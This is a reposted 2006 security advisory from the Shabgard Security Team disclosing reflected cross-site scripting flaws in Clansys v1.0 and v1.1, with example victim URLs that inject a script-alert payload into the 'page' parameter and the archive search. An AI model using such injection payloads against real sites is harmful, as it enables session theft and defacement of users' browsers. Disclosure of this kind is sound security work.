Computer Security

Security Advisory: Clansys Multiple Xss Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Remote File Inclusion in VBulletin ImpEx

  [eVuln] qliteNews SQL Injection Vulnerability

  SimpleBBS v1.1(posts.
php) remote command execution

  SimpleBBS v1.1(posts.
php) remote command execution

From:soot hackers <soothackers_(at)_gmail.com>
Date:13.04.2006
Subject:Clansys Multiple Xss Vulnerabilities

---------------------------------------------
Clansys v.1.1 Multiple Xss Vulnerabilities
---------------------------------------------

Bug:
Clansys v.1.0
 1- http://victim/path/index.php?page=archiv&func=search
    "><script>alert(/Soot/)</script>

Clansys v.1.1
 1- http://victim/path/index.
php?page="><script>alert(/Soot/)</script>

 2- http://victim/path/index.php?page=archiv&func=search
    "><script>alert(/Soot/)</script>

---------------------------------------------
Source :
 http://soot.shabgard.org/bugs/Clansys.txt

Credit :
 Soot
 Shabgard Security Team
 http://www.shabgard.org

Greetz :
 Hregy,Elite,Bl2k,Littlehacker
---------------------------------------------
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru